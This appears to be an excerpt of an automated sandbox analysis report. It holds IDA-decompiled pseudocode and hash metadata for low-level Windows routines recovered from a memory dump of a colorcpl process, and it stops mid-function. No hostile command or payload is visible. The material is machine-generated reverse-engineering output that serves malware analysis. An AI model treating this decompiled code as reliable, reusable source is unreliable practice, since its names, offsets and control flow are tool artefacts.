                                                                                                0x06e4238f
                                                                                                0x00000000
                                                                                                0x06e4236e
                                                                                                0x06e4236e
                                                                                                0x06e4218e
                                                                                                0x06e4218e
                                                                                                0x06e42191
                                                                                                0x06e42195
                                                                                                0x06e85a03
                                                                                                0x06e85a06
                                                                                                0x06e85a0c
                                                                                                0x06e85a0f
                                                                                                0x06e85a11
                                                                                                0x06e85a13
                                                                                                0x06e85a13
                                                                                                0x06e85a19
                                                                                                0x06e85a1f
                                                                                                0x00000000
                                                                                                0x06e4219b
                                                                                                0x06e4219b
                                                                                                0x06e421a0
                                                                                                0x06e42282
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e421a6
                                                                                                0x06e421a9
                                                                                                0x06e421ac
                                                                                                0x06e421ae
                                                                                                0x06e421b3
                                                                                                0x06e4228b
                                                                                                0x06e42290
                                                                                                0x06e42379
                                                                                                0x06e42296
                                                                                                0x06e42298
                                                                                                0x06e42298
                                                                                                0x06e42290
                                                                                                0x06e421b9
                                                                                                0x06e421be
                                                                                                0x06e422a2
                                                                                                0x06e422a2
                                                                                                0x06e421c4
                                                                                                0x06e421c8
                                                                                                0x06e421cc
                                                                                                0x06e421d0
                                                                                                0x06e421d4
                                                                                                0x06e421de
                                                                                                0x06e421e3
                                                                                                0x06e85a29
                                                                                                0x06e85a2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85a3b
                                                                                                0x00000000
                                                                                                0x06e421e9
                                                                                                0x06e421e9
                                                                                                0x06e421e9
                                                                                                0x06e421ee
                                                                                                0x06e421f1
                                                                                                0x06e85a45
                                                                                                0x06e85a4b
                                                                                                0x06e85a52
                                                                                                0x06e85a58
                                                                                                0x06e85a5d
                                                                                                0x06e85a5f
                                                                                                0x06e85a71
                                                                                                0x06e85a61
                                                                                                0x06e85a6a
                                                                                                0x06e85a6a
                                                                                                0x06e85a76
                                                                                                0x06e85a79
                                                                                                0x06e85a7f
                                                                                                0x06e85a83
                                                                                                0x06e85a85
                                                                                                0x06e85a87
                                                                                                0x06e85a87
                                                                                                0x06e85a8c
                                                                                                0x06e85a91
                                                                                                0x06e85a97
                                                                                                0x06e85a9f
                                                                                                0x06e85aa0
                                                                                                0x06e85aa1
                                                                                                0x06e85aa6
                                                                                                0x06e85aab
                                                                                                0x06e85ab1
                                                                                                0x06e85ab3
                                                                                                0x06e85ab9
                                                                                                0x06e85aca
                                                                                                0x06e85ad4
                                                                                                0x06e85ad4
                                                                                                0x06e85ade
                                                                                                0x06e85ade
                                                                                                0x06e85aab
                                                                                                0x06e85a79
                                                                                                0x06e85a52
                                                                                                0x06e421f7
                                                                                                0x06e421f9
                                                                                                0x06e421fe
                                                                                                0x06e421fe
                                                                                                0x06e421e3
                                                                                                0x06e42195
                                                                                                0x06e4236c
                                                                                                0x06e42122
                                                                                                0x06e42122
                                                                                                0x06e42124
                                                                                                0x06e42231
                                                                                                0x06e42236
                                                                                                0x06e42236
                                                                                                0x06e42238
                                                                                                0x06e42238
                                                                                                0x06e42240
                                                                                                0x06e42242
                                                                                                0x06e42244
                                                                                                0x06e859fc
                                                                                                0x06e4218c
                                                                                                0x06e4218c
                                                                                                0x00000000
                                                                                                0x06e4218c
                                                                                                0x06e4224a
                                                                                                0x06e4224f
                                                                                                0x06e42256
                                                                                                0x06e42304
                                                                                                0x06e42309
                                                                                                0x06e4230f
                                                                                                0x06e4231e
                                                                                                0x06e4231e
                                                                                                0x06e4231e
                                                                                                0x06e42320
                                                                                                0x06e42325
                                                                                                0x06e4232a
                                                                                                0x06e4232c
                                                                                                0x06e4233e
                                                                                                0x06e4233e
                                                                                                0x00000000
                                                                                                0x06e4232c
                                                                                                0x06e42311
                                                                                                0x06e42317
                                                                                                0x06e4231a
                                                                                                0x06e4231c
                                                                                                0x06e42380
                                                                                                0x06e42380
                                                                                                0x06e42380
                                                                                                0x06e42384
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42386
                                                                                                0x00000000
                                                                                                0x06e4231c
                                                                                                0x06e4225c
                                                                                                0x06e4225c
                                                                                                0x00000000
                                                                                                0x06e4225c
                                                                                                0x06e4212a
                                                                                                0x06e42134
                                                                                                0x06e42138
                                                                                                0x06e4213d
                                                                                                0x06e85858
                                                                                                0x06e85863
                                                                                                0x06e85863
                                                                                                0x06e85867
                                                                                                0x06e8586a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8586c
                                                                                                0x06e8586c
                                                                                                0x06e85871
                                                                                                0x06e85875
                                                                                                0x06e85877
                                                                                                0x06e85997
                                                                                                0x06e8599c
                                                                                                0x06e859a1
                                                                                                0x06e859a7
                                                                                                0x06e859a7
                                                                                                0x00000000
                                                                                                0x06e859a7
                                                                                                0x06e8587d
                                                                                                0x00000000
                                                                                                0x06e8588b
                                                                                                0x06e8588b
                                                                                                0x06e85890
                                                                                                0x06e85892
                                                                                                0x06e85894
                                                                                                0x06e85899
                                                                                                0x06e8589b
                                                                                                0x06e858a0
                                                                                                0x06e858a0
                                                                                                0x06e858aa
                                                                                                0x06e858b2
                                                                                                0x06e858b6
                                                                                                0x06e858be
                                                                                                0x06e858c6
                                                                                                0x06e858c9
                                                                                                0x06e8590d
                                                                                                0x06e85917
                                                                                                0x06e8591a
                                                                                                0x06e8591c
                                                                                                0x06e85920
                                                                                                0x06e85928
                                                                                                0x06e8592a
                                                                                                0x06e8592c
                                                                                                0x06e8592e
                                                                                                0x06e8592e
                                                                                                0x06e858cb
                                                                                                0x06e858cd
                                                                                                0x06e858d8
                                                                                                0x06e858e0
                                                                                                0x06e858f4
                                                                                                0x06e858fe
                                                                                                0x06e858fe
                                                                                                0x06e8593a
                                                                                                0x06e8593e
                                                                                                0x06e85940
                                                                                                0x06e85942
                                                                                                0x00000000
                                                                                                0x06e85944
                                                                                                0x06e85944
                                                                                                0x06e85949
                                                                                                0x06e8594e
                                                                                                0x06e8594e
                                                                                                0x06e85953
                                                                                                0x06e8595b
                                                                                                0x06e85976
                                                                                                0x06e85976
                                                                                                0x06e8597a
                                                                                                0x06e8597f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85981
                                                                                                0x06e85981
                                                                                                0x06e85981
                                                                                                0x06e85983
                                                                                                0x06e85988
                                                                                                0x06e8598d
                                                                                                0x06e85991
                                                                                                0x06e85991
                                                                                                0x00000000
                                                                                                0x06e8595d
                                                                                                0x06e8595d
                                                                                                0x06e85963
                                                                                                0x06e85965
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @A
                                                                                                • API String ID: 0-3377101527
                                                                                                • Opcode ID: ad3308e87d1509687a696a151c1478927a7976afdda43feaa888d547f8aced89
                                                                                                • Instruction ID: 4ed72eea900580ecf1b285244b946c2010986ee4ff7d7b80a1942e87d274d932
                                                                                                • Opcode Fuzzy Hash: ad3308e87d1509687a696a151c1478927a7976afdda43feaa888d547f8aced89
                                                                                                • Instruction Fuzzy Hash: 24F13970A183018FE7E5EF38D84076A77E5AF85318F05A51DFAA98B380DB31D944CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E06E1B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                				signed int _t65;
                                                                                                				signed short _t69;
                                                                                                				intOrPtr _t70;
                                                                                                				signed short _t85;
                                                                                                				void* _t86;
                                                                                                				signed short _t89;
                                                                                                				signed short _t91;
                                                                                                				intOrPtr _t92;
                                                                                                				intOrPtr _t97;
                                                                                                				intOrPtr* _t98;
                                                                                                				signed short _t99;
                                                                                                				signed short _t101;
                                                                                                				void* _t102;
                                                                                                				char* _t103;
                                                                                                				signed short _t104;
                                                                                                				intOrPtr* _t110;
                                                                                                				void* _t111;
                                                                                                				void* _t114;
                                                                                                				intOrPtr* _t115;
                                                                                                
                                                                                                				_t109 = __esi;
                                                                                                				_t108 = __edi;
                                                                                                				_t106 = __edx;
                                                                                                				_t95 = __ebx;
                                                                                                				_push(0x90);
                                                                                                				_push(0x6eef7a8);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                				if(__edx == 0xffffffff) {
                                                                                                					L6:
                                                                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                					__eflags = _t65 & 0x00000002;
                                                                                                					if((_t65 & 0x00000002) != 0) {
                                                                                                						L3:
                                                                                                						L4:
                                                                                                						return E06E6D130(_t95, _t108, _t109);
                                                                                                					}
                                                                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                					_t108 = 0;
                                                                                                					_t109 = 0;
                                                                                                					_t95 = 0;
                                                                                                					__eflags = 0;
                                                                                                					while(1) {
                                                                                                						__eflags = _t95 - 0x200;
                                                                                                						if(_t95 >= 0x200) {
                                                                                                							break;
                                                                                                						}
                                                                                                						E06E5D000(0x80);
                                                                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                						_t108 = _t115;
                                                                                                						_t95 = _t95 - 0xffffff80;
                                                                                                						_t17 = _t114 - 4;
                                                                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                						__eflags =  *_t17;
                                                                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                						_t102 = _t110 + 1;
                                                                                                						do {
                                                                                                							_t85 =  *_t110;
                                                                                                							_t110 = _t110 + 1;
                                                                                                							__eflags = _t85;
                                                                                                						} while (_t85 != 0);
                                                                                                						_t111 = _t110 - _t102;
                                                                                                						_t21 = _t95 - 1; // -129
                                                                                                						_t86 = _t21;
                                                                                                						__eflags = _t111 - _t86;
                                                                                                						if(_t111 > _t86) {
                                                                                                							_t111 = _t86;
                                                                                                						}
                                                                                                						E06E5F3E0(_t108, _t106, _t111);
                                                                                                						_t115 = _t115 + 0xc;
                                                                                                						_t103 = _t111 + _t108;
                                                                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                						_t89 = _t95 - _t111;
                                                                                                						__eflags = _t89;
                                                                                                						_push(0);
                                                                                                						if(_t89 == 0) {
                                                                                                							L15:
                                                                                                							_t109 = 0xc000000d;
                                                                                                							goto L16;
                                                                                                						} else {
                                                                                                							__eflags = _t89 - 0x7fffffff;
                                                                                                							if(_t89 <= 0x7fffffff) {
                                                                                                								L16:
                                                                                                								 *(_t114 - 0x94) = _t109;
                                                                                                								__eflags = _t109;
                                                                                                								if(_t109 < 0) {
                                                                                                									__eflags = _t89;
                                                                                                									if(_t89 != 0) {
                                                                                                										 *_t103 = 0;
                                                                                                									}
                                                                                                									L26:
                                                                                                									 *(_t114 - 0xa0) = _t109;
                                                                                                									 *(_t114 - 4) = 0xfffffffe;
                                                                                                									__eflags = _t109;
                                                                                                									if(_t109 >= 0) {
                                                                                                										L31:
                                                                                                										_t98 = _t108;
                                                                                                										_t39 = _t98 + 1; // 0x1
                                                                                                										_t106 = _t39;
                                                                                                										do {
                                                                                                											_t69 =  *_t98;
                                                                                                											_t98 = _t98 + 1;
                                                                                                											__eflags = _t69;
                                                                                                										} while (_t69 != 0);
                                                                                                										_t99 = _t98 - _t106;
                                                                                                										__eflags = _t99;
                                                                                                										L34:
                                                                                                										_t70 =  *[fs:0x30];
                                                                                                										__eflags =  *((char*)(_t70 + 2));
                                                                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                											L40:
                                                                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                											 *(_t114 - 4) = 1;
                                                                                                											_push(_t114 - 0x74);
                                                                                                											L06E6DEF0(_t99, _t106);
                                                                                                											 *(_t114 - 4) = 0xfffffffe;
                                                                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                											goto L3;
                                                                                                										}
                                                                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                											goto L40;
                                                                                                										}
                                                                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                										_push(_t99 & 0x0000ffff);
                                                                                                										_push(_t108);
                                                                                                										_push(1);
                                                                                                										_t101 = E06E5B280();
                                                                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                											__eflags = _t101 - 0x80000003;
                                                                                                											if(_t101 == 0x80000003) {
                                                                                                												E06E5B7E0(1);
                                                                                                												_t101 = 0;
                                                                                                												__eflags = 0;
                                                                                                											}
                                                                                                										}
                                                                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                										goto L4;
                                                                                                									}
                                                                                                									__eflags = _t109 - 0x80000005;
                                                                                                									if(_t109 == 0x80000005) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									break;
                                                                                                								}
                                                                                                								 *(_t114 - 0x90) = 0;
                                                                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                                								_t91 = E06E5E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                                								_t115 = _t115 + 0x10;
                                                                                                								_t104 = _t91;
                                                                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                                								__eflags = _t104;
                                                                                                								if(_t104 < 0) {
                                                                                                									L21:
                                                                                                									_t109 = 0x80000005;
                                                                                                									 *(_t114 - 0x90) = 0x80000005;
                                                                                                									L22:
                                                                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                                									L23:
                                                                                                									 *(_t114 - 0x94) = _t109;
                                                                                                									goto L26;
                                                                                                								}
                                                                                                								__eflags = _t104 - _t92;
                                                                                                								if(__eflags > 0) {
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							goto L15;
                                                                                                						}
                                                                                                					}
                                                                                                					__eflags = _t109;
                                                                                                					if(_t109 >= 0) {
                                                                                                						goto L31;
                                                                                                					}
                                                                                                					__eflags = _t109 - 0x80000005;
                                                                                                					if(_t109 != 0x80000005) {
                                                                                                						goto L31;
                                                                                                					}
                                                                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                                					_t38 = _t95 - 1; // -129
                                                                                                					_t99 = _t38;
                                                                                                					goto L34;
                                                                                                				}
                                                                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                					__eflags = __edx - 0x65;
                                                                                                					if(__edx != 0x65) {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				L2:
                                                                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                				_push(_t106);
                                                                                                				if(E06E5A890() != 0) {
                                                                                                					goto L6;
                                                                                                				}
                                                                                                				goto L3;
                                                                                                			}























                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: _vswprintf_s
                                                                                                • String ID:
                                                                                                • API String ID: 677850445-0
                                                                                                • Opcode ID: 4e76fb299d02c0fc82d6a9d4423b3538bf225664c5308bd91123af23ef91eb3f
                                                                                                • Instruction ID: 272ce5d6f7e0daa5504a8ce56758466044c1697d1a647783b9575d18db352304
                                                                                                • Opcode Fuzzy Hash: 4e76fb299d02c0fc82d6a9d4423b3538bf225664c5308bd91123af23ef91eb3f
                                                                                                • Instruction Fuzzy Hash: 1551FF71E1036ACFEBB1CF64C944BAEBBF0AF04314F1151A9E869AB2C1D7704945DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E06E3B944(signed int* __ecx, char __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v28;
                                                                                                				signed int _v32;
                                                                                                				char _v36;
                                                                                                				signed int _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				signed int* _v48;
                                                                                                				signed int _v52;
                                                                                                				signed int _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				intOrPtr _v68;
                                                                                                				intOrPtr _v72;
                                                                                                				intOrPtr _v76;
                                                                                                				char _v77;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t65;
                                                                                                				intOrPtr _t67;
                                                                                                				intOrPtr _t68;
                                                                                                				char* _t73;
                                                                                                				intOrPtr _t77;
                                                                                                				intOrPtr _t78;
                                                                                                				signed int _t82;
                                                                                                				intOrPtr _t83;
                                                                                                				void* _t87;
                                                                                                				char _t88;
                                                                                                				intOrPtr* _t89;
                                                                                                				intOrPtr _t91;
                                                                                                				void* _t97;
                                                                                                				intOrPtr _t100;
                                                                                                				void* _t102;
                                                                                                				void* _t107;
                                                                                                				signed int _t108;
                                                                                                				intOrPtr* _t112;
                                                                                                				void* _t113;
                                                                                                				intOrPtr* _t114;
                                                                                                				intOrPtr _t115;
                                                                                                				intOrPtr _t116;
                                                                                                				intOrPtr _t117;
                                                                                                				signed int _t118;
                                                                                                				void* _t130;
                                                                                                
                                                                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                                				_v8 =  *0x6f0d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                                				_t112 = __ecx;
                                                                                                				_v77 = __edx;
                                                                                                				_v48 = __ecx;
                                                                                                				_v28 = 0;
                                                                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                                				_t105 =  *_t5;
                                                                                                				_v20 = 0;
                                                                                                				_v16 = 0;
                                                                                                				if(_t105 == 0) {
                                                                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                                					_t60 =  *__ecx |  *_t50;
                                                                                                					if(( *__ecx |  *_t50) != 0) {
                                                                                                						 *__ecx = 0;
                                                                                                						__ecx[1] = 0;
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                						} else {
                                                                                                							_t65 = 0x7ffe0386;
                                                                                                						}
                                                                                                						if( *_t65 != 0) {
                                                                                                							E06EE8CD6(_t112);
                                                                                                						}
                                                                                                						_push(0);
                                                                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                                						_push( *_t52);
                                                                                                						_t60 = E06E59E20();
                                                                                                					}
                                                                                                					L20:
                                                                                                					_pop(_t107);
                                                                                                					_pop(_t113);
                                                                                                					_pop(_t87);
                                                                                                					return E06E5B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                                				}
                                                                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                                				_t67 =  *_t8;
                                                                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                                				_t108 =  *(_t67 + 0x14);
                                                                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                                				_t105 = 0x2710;
                                                                                                				asm("sbb eax, edi");
                                                                                                				_v44 = _t88;
                                                                                                				_v52 = _t108;
                                                                                                				_t60 = E06E5CE00(_t97, _t68, 0x2710, 0);
                                                                                                				_v56 = _t60;
                                                                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                                					L3:
                                                                                                					 *(_t112 + 0x44) = _t60;
                                                                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                                					 *_t112 = _t88;
                                                                                                					 *(_t112 + 4) = _t108;
                                                                                                					_v20 = _t60 * 0x2710;
                                                                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                                					if(_v77 != 0) {
                                                                                                						L16:
                                                                                                						_v36 = _t88;
                                                                                                						_v32 = _t108;
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                						} else {
                                                                                                							_t73 = 0x7ffe0386;
                                                                                                						}
                                                                                                						if( *_t73 != 0) {
                                                                                                							_t105 = _v40;
                                                                                                							E06EE8F6A(_t112, _v40, _t88, _t108);
                                                                                                						}
                                                                                                						_push( &_v28);
                                                                                                						_push(0);
                                                                                                						_push( &_v36);
                                                                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                                						_push( *_t48);
                                                                                                						_t60 = E06E5AF60();
                                                                                                						goto L20;
                                                                                                					} else {
                                                                                                						_t89 = 0x7ffe03b0;
                                                                                                						do {
                                                                                                							_t114 = 0x7ffe0010;
                                                                                                							do {
                                                                                                								_t77 =  *0x6f08628; // 0x0
                                                                                                								_v68 = _t77;
                                                                                                								_t78 =  *0x6f0862c; // 0x0
                                                                                                								_v64 = _t78;
                                                                                                								_v72 =  *_t89;
                                                                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                                								while(1) {
                                                                                                									_t105 =  *0x7ffe000c;
                                                                                                									_t100 =  *0x7ffe0008;
                                                                                                									if(_t105 ==  *_t114) {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                									asm("pause");
                                                                                                								}
                                                                                                								L8:
                                                                                                								_t89 = 0x7ffe03b0;
                                                                                                								_t115 =  *0x7ffe03b0;
                                                                                                								_t82 =  *0x7FFE03B4;
                                                                                                								_v60 = _t115;
                                                                                                								_t114 = 0x7ffe0010;
                                                                                                								_v56 = _t82;
                                                                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                                                                							_t83 =  *0x6f08628; // 0x0
                                                                                                							_t116 =  *0x6f0862c; // 0x0
                                                                                                							_v76 = _t116;
                                                                                                							_t117 = _v68;
                                                                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                                                                						asm("sbb edx, [esp+0x24]");
                                                                                                						_t102 = _t100 - _v60 - _t117;
                                                                                                						_t112 = _v48;
                                                                                                						_t91 = _v44;
                                                                                                						asm("sbb edx, eax");
                                                                                                						_t130 = _t105 - _v52;
                                                                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                							_t88 = _t102 - _t91;
                                                                                                							asm("sbb edx, edi");
                                                                                                							_t108 = _t105;
                                                                                                						} else {
                                                                                                							_t88 = 0;
                                                                                                							_t108 = 0;
                                                                                                						}
                                                                                                						goto L16;
                                                                                                					}
                                                                                                				} else {
                                                                                                					if( *(_t112 + 0x44) == _t60) {
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					goto L3;
                                                                                                				}
                                                                                                			}

















































                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06E3B9A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 885266447-0
                                                                                                • Opcode ID: f5ec35934416c65624cd6d291b8b7633a21fb445553a6a5de79e5b338eea89de
                                                                                                • Instruction ID: ace9779042d81245485966f09db39e3e10360c2b82a75a3dbb31a2a715603654
                                                                                                • Opcode Fuzzy Hash: f5ec35934416c65624cd6d291b8b7633a21fb445553a6a5de79e5b338eea89de
                                                                                                • Instruction Fuzzy Hash: 57518C70A18714CFD7A0CF28C4C492BBBE9FB98644F15996EE99687344D730E844CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E06E42581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v16;
                                                                                                				unsigned int _v24;
                                                                                                				void* _v28;
                                                                                                				signed int _v32;
                                                                                                				unsigned int _v36;
                                                                                                				void* _v37;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				signed int _v52;
                                                                                                				signed int _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				signed int _v64;
                                                                                                				signed int _v68;
                                                                                                				signed int _v72;
                                                                                                				signed int _v76;
                                                                                                				signed int _v80;
                                                                                                				signed int _t229;
                                                                                                				signed int _t233;
                                                                                                				signed int _t244;
                                                                                                				signed int _t246;
                                                                                                				intOrPtr _t248;
                                                                                                				signed int _t251;
                                                                                                				signed int _t258;
                                                                                                				signed int _t261;
                                                                                                				signed int _t269;
                                                                                                				signed int _t271;
                                                                                                				intOrPtr _t276;
                                                                                                				signed int _t278;
                                                                                                				signed int _t280;
                                                                                                				void* _t281;
                                                                                                				signed int _t282;
                                                                                                				unsigned int _t285;
                                                                                                				signed int _t289;
                                                                                                				signed int _t291;
                                                                                                				signed int _t295;
                                                                                                				intOrPtr _t308;
                                                                                                				signed int _t317;
                                                                                                				signed int _t319;
                                                                                                				signed int _t320;
                                                                                                				signed int _t324;
                                                                                                				signed int _t325;
                                                                                                				void* _t328;
                                                                                                				signed int _t329;
                                                                                                				signed int _t331;
                                                                                                				signed int _t334;
                                                                                                				void* _t335;
                                                                                                				void* _t337;
                                                                                                				void* _t338;
                                                                                                
                                                                                                				_t331 = _t334;
                                                                                                				_t335 = _t334 - 0x4c;
                                                                                                				_v8 =  *0x6f0d360 ^ _t331;
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t324 = 0x6f0b2e8;
                                                                                                				_v56 = _a4;
                                                                                                				_v48 = __edx;
                                                                                                				_v60 = __ecx;
                                                                                                				_t285 = 0;
                                                                                                				_v80 = 0;
                                                                                                				asm("movsd");
                                                                                                				_v64 = 0;
                                                                                                				_v76 = 0;
                                                                                                				_v72 = 0;
                                                                                                				asm("movsd");
                                                                                                				_v44 = 0;
                                                                                                				_v52 = 0;
                                                                                                				_v68 = 0;
                                                                                                				asm("movsd");
                                                                                                				_v32 = 0;
                                                                                                				_v36 = 0;
                                                                                                				asm("movsd");
                                                                                                				_v16 = 0;
                                                                                                				_t338 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                                				_t276 = 0x48;
                                                                                                				_t305 = 0 | _t338 == 0x00000000;
                                                                                                				_t317 = 0;
                                                                                                				_v37 = _t338 == 0;
                                                                                                				if(_v48 <= 0) {
                                                                                                					L16:
                                                                                                					_t45 = _t276 - 0x48; // 0x0
                                                                                                					__eflags = _t45 - 0xfffe;
                                                                                                					if(_t45 > 0xfffe) {
                                                                                                						_t325 = 0xc0000106;
                                                                                                						goto L32;
                                                                                                					} else {
                                                                                                						_t324 = L06E34620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
                                                                                                						_v52 = _t324;
                                                                                                						__eflags = _t324;
                                                                                                						if(_t324 == 0) {
